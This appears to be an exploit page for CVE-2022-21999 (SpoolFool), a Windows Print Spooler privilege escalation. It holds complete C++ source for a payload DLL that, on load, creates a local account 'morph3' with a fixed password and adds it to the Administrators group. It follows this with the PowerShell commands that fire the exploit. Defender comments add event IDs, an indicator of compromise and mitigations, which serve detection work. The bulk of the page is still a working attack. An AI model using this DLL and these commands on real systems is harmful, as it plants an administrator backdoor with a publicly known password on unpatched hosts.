CVE-2022-21999 - SpoolFool

Link is below

Source of pwn.dll (dllmain.cpp), the DLL that is passed to the exploit:

// dllmain.cpp : Defines the entry point for the DLL application.
#include "pch.h"
#include <stdlib.h>
  
// Payload body: runs two `net` commands through system().
//  1. `net user ... /add` creates a local account named "morph3" with a
//     fixed password.
//  2. `net localgroup Administrators ... /add` puts that account in the local
//     Administrators group.
// The commands run with the privileges of whichever process loads this DLL.
//
// Defender notes:
//  - The account name and password are published on this page, so a host
//    where this ran has an administrator account with a publicly known
//    credential. Treat a local account named "morph3" as an indicator of
//    compromise and remove it.
//  - Account creation and the group change are logged as Security events
//    4720 (user account created) and 4732 (member added to a local group)
//    when account-management auditing is enabled.
//  - system() runs the command through the command interpreter, so process
//    creation telemetry (Security 4688 / Sysmon 1) shows cmd.exe and
//    net.exe / net1.exe as children of the loading process.
//    NOTE(review): for SpoolFool that parent is presumably spoolsv.exe; the
//    page itself does not show the load path.
void pwn() {
    system("net user morph3 Password123! /add");
    system("net localgroup Administrators morph3 /add");
}

  
// DLL entry point. The loader calls it with a reason code; on
// DLL_PROCESS_ATTACH (the DLL being mapped into a process) it calls pwn().
// The other three reason codes do nothing. It always returns TRUE.
//
// hModule and lpReserved are unused.
//
// Defender note: the payload fires at load time, with no exported function
// needing to be called, so the detection point is the module load itself
// (e.g. an unsigned or unexpected DLL loaded by a service process).
BOOL APIENTRY DllMain( HMODULE hModule,
 DWORD ul_reason_for_call,
 LPVOID lpReserved
 )
{

 switch (ul_reason_for_call)
 {
	 case DLL_PROCESS_ATTACH:
		 pwn();
		 // No break here: control falls through the empty cases below to
		 // the shared break, so the result is the same as an explicit break.
	 case DLL_THREAD_ATTACH:
	 case DLL_THREAD_DETACH:
	 case DLL_PROCESS_DETACH:
	 break;

 }

 return TRUE;

}

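Exploiting it (CVE-2022-21999 was addressed in Microsoft's February 2022 security updates, so this applies to hosts missing that patch):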

# Loads the SpoolFool PowerShell script from the current directory, then calls
# Invoke-SpoolFool with the path to the DLL built from dllmain.cpp above.
# NOTE(review): what Invoke-SpoolFool does internally is not shown on this page.
#
# Defender notes:
#  - PowerShell script block logging (event 4104) records the Import-Module /
#    Invoke-SpoolFool invocation when it is enabled.
#  - Mitigations: apply the vendor fix for CVE-2022-21999, and disable the
#    Print Spooler service on hosts that do not need to print.
#  - Afterwards, look for the new local administrator account created by the
#    DLL (Security events 4720 / 4732).
Import-Module .\SpoolFool.ps1
Invoke-SpoolFool -dll .\pwn.dll
